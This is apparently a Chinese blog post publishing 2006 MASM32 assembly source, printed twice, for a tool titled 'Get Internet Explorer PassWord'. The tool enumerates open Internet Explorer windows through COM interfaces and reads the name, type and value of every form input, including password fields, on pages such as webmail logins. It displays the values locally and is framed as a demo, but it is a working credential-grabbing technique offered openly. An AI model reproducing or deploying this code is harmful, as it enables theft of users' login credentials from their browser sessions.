本文介绍了一种通过DCOM接口获取Internet Explorer中保存的登录密码的方法。该方法使用了多种COM组件,包括ShellWindows、IWebBrowser2和IHTMLDocument2等,详细展示了如何遍历IE窗口并获取特定表单元素的名称、类型和值。
comment %
#--------------------------------------# #
# Get Internet Explorer PassWord--> # #
# -->use DCOM InterFace(only a Demo) # #
# 2006.06.28 #
# codz: czy # #
#------------------------------------------# #
system :test on ie6+XPSP2
webmail:test on yahoo,hotmail,gmail...
%
.586
.model flat, stdcall
option casemap :none ; case sensitive
include /masm32/bin/iep.inc
; #########################################################################
.const
CLSID_ShellWindows GUID sCLSID_ShellWindows
IID_ShellWindows GUID sIID_ShellWindow
IID_WB GUID sIID_WB
IID_DOC GUID sIID_DOC
IID_HTMLFE GUID sIID_HTMLFE
IID_HTMLIPTE GUID sIID_HTMLIPTE
.data
format db 'form num:%d',0
format2 db 'elem num:%d',0
b1 dw 'N','a','m','e','=','[',0,0
b2 dw 'V','a','l','u','e','=','[',0,0
b3 dw 'T','y','p','e','=','[',0,0
b4 dw ']',' ',0,0
b5 dw ']',13,10,'T','i','t','l','e','=',0,0
mynull dw 'N','U','L','L',0,0
errgetforms db '得到FORMS错误',0
.data?
pps dd ? ;IShellWindows
ppi dd ? ;IWebBrowser2
ppi2 dd ?
ppd dd ? ;IHTMLDocument2
ppd2 dd ?
pphtmlec dd ? ;IHTMLElementCollection
ppfe dd ? ;IHTMLFormElement
ppfe2 dd ?
ppie dd ? ;IHTMLInputElement
ppie2 dd ? ;IHTMLInputTextElement
ienum dd ?
formnum dd ?
elemnum dd ?
buffer db 512 dup (0)
height dd ?
ielocation db 256 dup(?)
tit dd ?
pieloc dd ?
inputtype dd ?
inputvalue dd ?
inputname dd ?
szinputname db 64 dup (?)
szinputvalue db 64 dup (?)
szinputtype db 64 dup (?)
szietitle db 256 dup (?)
.code
CheckNull proc szinputaddr:dword,input:dword
invoke lstrlenW,input
.if eax==0
invoke lstrcpyW,szinputaddr,addr mynull
.else
invoke lstrcpynW,szinputaddr,input,32
.endif
ret
CheckNull endp
FindIEPass proc
LOCAL urlstr: DWORD
invoke CoInitialize, 0
invoke CoCreateInstance, addr CLSID_ShellWindows, NULL,CLSCTX_ALL ,
addr IID_ShellWindows, addr pps
.IF eax == S_OK
coinvoke pps,IShellWindow,GetCount,addr ienum
.while ienum>0
dec ienum
mov edx,dword ptr [pps]
mov edx,[edx]
lea eax,ppi
push eax
push 0 ;/
push ienum ; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [pps]
call dword ptr [edx+20h]
;IShellWindow->Item,这儿返回IWebBrowser2的Dispatch指针
.if eax==0
coinvoke ppi, IDispatch, QueryInterface, ADDR IID_WB, ADDR ppi2
;这儿得到IWebBrowser2的接口指针
.if eax==0
coinvoke ppi2, IWebBrowser2,LocationURL,addr pieloc
invoke lstrcpynW,addr ielocation,pieloc,128
coinvoke ppi2, IWebBrowser2, Document_get, addr ppd
;这儿得到IHTMLDocument2的Dispatch指针
.if eax==0
coinvoke ppd, IDispatch, QueryInterface, ADDR IID_DOC, ADDR ppd2
;这儿得到IHTMLDocument2的接口指针
.if eax==0
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,tit
push eax
push dword ptr [ppd2]
call dword ptr [edx+4*17] ;IHTMLDocument2->gettitle
invoke lstrcpynW,addr szietitle,tit,128
;invoke MessageBoxW,0,tit,tit,1 ;UNICODE字串
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,pphtmlec
push eax
push dword ptr [ppd2]
call dword ptr [edx+4*14] ;IHTMLDocument2->getforms
.if eax == 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,formnum
push eax
push dword ptr [pphtmlec]
call dword ptr [edx+4*9] ;IHTMLElementCollection->getformcount
;invoke wsprintf,addr buffer,addr format,formnum
;invoke MessageBox,0,addr buffer,addr buffer,1
.while formnum>0
dec formnum
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,ppfe
push eax
push 0 ;/
push 0 ; /_VARIANT参数
push 0 ; /
push 0 ;/
push 0 ;/
push formnum; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [pphtmlec]
call dword ptr [edx+4*11];IHTMLElementCollection->item3个参数
;得到IHTMLFormElement的Dispatch指针
coinvoke ppfe, IDispatch, QueryInterface, ADDR IID_HTMLFE, ADDR ppfe2
;得到IHTMLFormElement的接口指针
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,elemnum
push eax
push dword ptr [ppfe2]
call dword ptr [edx+4*27] ;IHTMLFormElement->getelementlength
;invoke wsprintf,addr buffer,addr format2,elemnum
;这儿可以得到FORM里面的INPUT元素个数
;invoke MessageBox,0,addr buffer,addr buffer,1
.while elemnum>0
dec elemnum
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,ppie
push eax
push 0 ;/
push 0 ; /_VARIANT参数
push 0 ; /
push 0 ;/
push 0 ;/
push elemnum; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [ppfe2]
call dword ptr [edx+4*29] ;IHTMLFormElement->item 三个参数
;得到IHTMLInputElement的Dispatch指针
.if eax==0
coinvoke ppie, IDispatch, QueryInterface, ADDR IID_HTMLIPTE, ADDR ppie2
;得到IHTMLInputTextElement的接口指针
.if eax==0
;---GET TYPE
;mov edx,dword ptr [ppie2]
;mov edx,[edx]
;lea eax,inputtype
;push eax
;push dword ptr [ppie2]
;call dword ptr [edx+4*7] ;IHTMLInputTextElement->gettype
coinvoke ppie2,IHTMLInputTextElement,GetType,addr inputtype
invoke CheckNull,addr szinputtype,inputtype
;---GET VALUE
coinvoke ppie2,IHTMLInputTextElement,GetValue,addr inputvalue
invoke CheckNull,addr szinputvalue,inputvalue
;---GET NAME
coinvoke ppie2,IHTMLInputTextElement,GetName,addr inputname
invoke CheckNull,addr szinputname,inputname
invoke lstrcpyW,addr buffer,addr b1
invoke lstrcatW,addr buffer,addr szinputname
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b2
invoke lstrcatW,addr buffer,addr szinputvalue
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b3
invoke lstrcatW,addr buffer,addr szinputtype
invoke lstrcatW,addr buffer,addr b5
invoke lstrcatW,addr buffer,addr szietitle
invoke MessageBoxW,0,addr buffer,addr ielocation,1
.endif
.endif
.endw
.endw
.else
invoke MessageBox,0,addr errgetforms,addr tit,1
.endif
.endif
.endif
.endif
.endif
.endw
coinvoke pps, IShellWindow, Release
.ENDIF
invoke CoUninitialize
ret
FindIEPass endp
start:
invoke FindIEPass
invoke ExitProcess,0
end start
#--------------------------------------# #
# Get Internet Explorer PassWord--> # #
# -->use DCOM InterFace(only a Demo) # #
# 2006.06.28 #
# codz: czy # #
#------------------------------------------# #
system :test on ie6+XPSP2
webmail:test on yahoo,hotmail,gmail...
%
.586
.model flat, stdcall
option casemap :none ; case sensitive
include /masm32/bin/iep.inc
; #########################################################################
.const
CLSID_ShellWindows GUID sCLSID_ShellWindows
IID_ShellWindows GUID sIID_ShellWindow
IID_WB GUID sIID_WB
IID_DOC GUID sIID_DOC
IID_HTMLFE GUID sIID_HTMLFE
IID_HTMLIPTE GUID sIID_HTMLIPTE
.data
format db 'form num:%d',0
format2 db 'elem num:%d',0
b1 dw 'N','a','m','e','=','[',0,0
b2 dw 'V','a','l','u','e','=','[',0,0
b3 dw 'T','y','p','e','=','[',0,0
b4 dw ']',' ',0,0
b5 dw ']',13,10,'T','i','t','l','e','=',0,0
mynull dw 'N','U','L','L',0,0
errgetforms db '得到FORMS错误',0
.data?
pps dd ? ;IShellWindows
ppi dd ? ;IWebBrowser2
ppi2 dd ?
ppd dd ? ;IHTMLDocument2
ppd2 dd ?
pphtmlec dd ? ;IHTMLElementCollection
ppfe dd ? ;IHTMLFormElement
ppfe2 dd ?
ppie dd ? ;IHTMLInputElement
ppie2 dd ? ;IHTMLInputTextElement
ienum dd ?
formnum dd ?
elemnum dd ?
buffer db 512 dup (0)
height dd ?
ielocation db 256 dup(?)
tit dd ?
pieloc dd ?
inputtype dd ?
inputvalue dd ?
inputname dd ?
szinputname db 64 dup (?)
szinputvalue db 64 dup (?)
szinputtype db 64 dup (?)
szietitle db 256 dup (?)
.code
CheckNull proc szinputaddr:dword,input:dword
invoke lstrlenW,input
.if eax==0
invoke lstrcpyW,szinputaddr,addr mynull
.else
invoke lstrcpynW,szinputaddr,input,32
.endif
ret
CheckNull endp
FindIEPass proc
LOCAL urlstr: DWORD
invoke CoInitialize, 0
invoke CoCreateInstance, addr CLSID_ShellWindows, NULL,CLSCTX_ALL ,
addr IID_ShellWindows, addr pps
.IF eax == S_OK
coinvoke pps,IShellWindow,GetCount,addr ienum
.while ienum>0
dec ienum
mov edx,dword ptr [pps]
mov edx,[edx]
lea eax,ppi
push eax
push 0 ;/
push ienum ; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [pps]
call dword ptr [edx+20h]
;IShellWindow->Item,这儿返回IWebBrowser2的Dispatch指针
.if eax==0
coinvoke ppi, IDispatch, QueryInterface, ADDR IID_WB, ADDR ppi2
;这儿得到IWebBrowser2的接口指针
.if eax==0
coinvoke ppi2, IWebBrowser2,LocationURL,addr pieloc
invoke lstrcpynW,addr ielocation,pieloc,128
coinvoke ppi2, IWebBrowser2, Document_get, addr ppd
;这儿得到IHTMLDocument2的Dispatch指针
.if eax==0
coinvoke ppd, IDispatch, QueryInterface, ADDR IID_DOC, ADDR ppd2
;这儿得到IHTMLDocument2的接口指针
.if eax==0
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,tit
push eax
push dword ptr [ppd2]
call dword ptr [edx+4*17] ;IHTMLDocument2->gettitle
invoke lstrcpynW,addr szietitle,tit,128
;invoke MessageBoxW,0,tit,tit,1 ;UNICODE字串
mov edx,dword ptr [ppd2]
mov edx,[edx]
lea eax,pphtmlec
push eax
push dword ptr [ppd2]
call dword ptr [edx+4*14] ;IHTMLDocument2->getforms
.if eax == 0
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,formnum
push eax
push dword ptr [pphtmlec]
call dword ptr [edx+4*9] ;IHTMLElementCollection->getformcount
;invoke wsprintf,addr buffer,addr format,formnum
;invoke MessageBox,0,addr buffer,addr buffer,1
.while formnum>0
dec formnum
mov edx,dword ptr [pphtmlec]
mov edx,[edx]
lea eax,ppfe
push eax
push 0 ;/
push 0 ; /_VARIANT参数
push 0 ; /
push 0 ;/
push 0 ;/
push formnum; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [pphtmlec]
call dword ptr [edx+4*11];IHTMLElementCollection->item3个参数
;得到IHTMLFormElement的Dispatch指针
coinvoke ppfe, IDispatch, QueryInterface, ADDR IID_HTMLFE, ADDR ppfe2
;得到IHTMLFormElement的接口指针
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,elemnum
push eax
push dword ptr [ppfe2]
call dword ptr [edx+4*27] ;IHTMLFormElement->getelementlength
;invoke wsprintf,addr buffer,addr format2,elemnum
;这儿可以得到FORM里面的INPUT元素个数
;invoke MessageBox,0,addr buffer,addr buffer,1
.while elemnum>0
dec elemnum
mov edx,dword ptr [ppfe2]
mov edx,[edx]
lea eax,ppie
push eax
push 0 ;/
push 0 ; /_VARIANT参数
push 0 ; /
push 0 ;/
push 0 ;/
push elemnum; /_VARIANT参数
push 0 ; /
push 3 ;/
push dword ptr [ppfe2]
call dword ptr [edx+4*29] ;IHTMLFormElement->item 三个参数
;得到IHTMLInputElement的Dispatch指针
.if eax==0
coinvoke ppie, IDispatch, QueryInterface, ADDR IID_HTMLIPTE, ADDR ppie2
;得到IHTMLInputTextElement的接口指针
.if eax==0
;---GET TYPE
;mov edx,dword ptr [ppie2]
;mov edx,[edx]
;lea eax,inputtype
;push eax
;push dword ptr [ppie2]
;call dword ptr [edx+4*7] ;IHTMLInputTextElement->gettype
coinvoke ppie2,IHTMLInputTextElement,GetType,addr inputtype
invoke CheckNull,addr szinputtype,inputtype
;---GET VALUE
coinvoke ppie2,IHTMLInputTextElement,GetValue,addr inputvalue
invoke CheckNull,addr szinputvalue,inputvalue
;---GET NAME
coinvoke ppie2,IHTMLInputTextElement,GetName,addr inputname
invoke CheckNull,addr szinputname,inputname
invoke lstrcpyW,addr buffer,addr b1
invoke lstrcatW,addr buffer,addr szinputname
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b2
invoke lstrcatW,addr buffer,addr szinputvalue
invoke lstrcatW,addr buffer,addr b4
invoke lstrcatW,addr buffer,addr b3
invoke lstrcatW,addr buffer,addr szinputtype
invoke lstrcatW,addr buffer,addr b5
invoke lstrcatW,addr buffer,addr szietitle
invoke MessageBoxW,0,addr buffer,addr ielocation,1
.endif
.endif
.endw
.endw
.else
invoke MessageBox,0,addr errgetforms,addr tit,1
.endif
.endif
.endif
.endif
.endif
.endw
coinvoke pps, IShellWindow, Release
.ENDIF
invoke CoUninitialize
ret
FindIEPass endp
start:
invoke FindIEPass
invoke ExitProcess,0
end start
扫一扫
1417
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
